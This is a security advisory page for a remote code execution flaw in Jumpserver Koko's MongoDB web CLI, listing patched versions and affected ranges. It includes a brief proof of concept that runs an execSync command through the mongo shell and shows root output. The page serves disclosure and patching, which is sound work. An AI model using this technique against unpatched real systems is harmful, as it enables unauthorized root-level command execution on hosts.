GHSA-4r5x-x283-wm96

Suggest an improvement
Source
https://github.com/advisories/GHSA-4r5x-x283-wm96
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-4r5x-x283-wm96/GHSA-4r5x-x283-wm96.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-4r5x-x283-wm96
Aliases
Related
Published
2023-10-24T19:47:50Z
Modified
2023-11-01T05:02:59.671565Z
Severity
  • 6.4 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:H CVSS Calculator
Summary
Jumpserver Koko vulnerable to remote code execution on the host system via MongoDB shell
Details

Impact

An authenticated user can exploit a vulnerability in MongoDB sessions to execute arbitrary commands, leading to remote code execution. This vulnerability may further be leveraged to gain root privileges on the host system.

Details

Through the WEB CLI interface provided by koko, a user logs into the authorized mongoDB database and exploits the MongoDB session to execute arbitrary commands.

admin> const { execSync } = require("child_process")
admin> console.log(execSync("id; hostname;").toString())
uid=0(root) gid=0(root) groups=0(root)
jms_koko
admin> 

Patches

Safe versions: - v2.28.20 - v3.7.1

Workarounds

It is recommended to upgrade the safe versions.

After upgrade, you can use the same method to check whether the vulnerability is fixed.

admin> console.log(execSync("id; hostname;").toString())
/bin/sh: line 1: /bin/hostname: Permission denied

References

Thanks for Oskar Zeino-Mahmalat of Sonar found and report this vulnerability

Database specific
{
    "nvd_published_at": "2023-09-27T21:15:10Z",
    "cwe_ids": [
        "CWE-94"
    ],
    "severity": "MODERATE",
    "github_reviewed": true,
    "github_reviewed_at": "2023-10-24T19:47:50Z"
}
References

Affected packages

Go / github.com/jumpserver/koko

Package

Name
github.com/jumpserver/koko
View open source insights on deps.dev
Purl
pkg:golang/github.com/jumpserver/koko

Affected ranges

Type
SEMVER
Events
Introduced
2.0.0
Fixed
2.28.20

Go / github.com/jumpserver/koko

Package

Name
github.com/jumpserver/koko
View open source insights on deps.dev
Purl
pkg:golang/github.com/jumpserver/koko

Affected ranges

Type
SEMVER
Events
Introduced
3.0.0
Fixed
3.7.1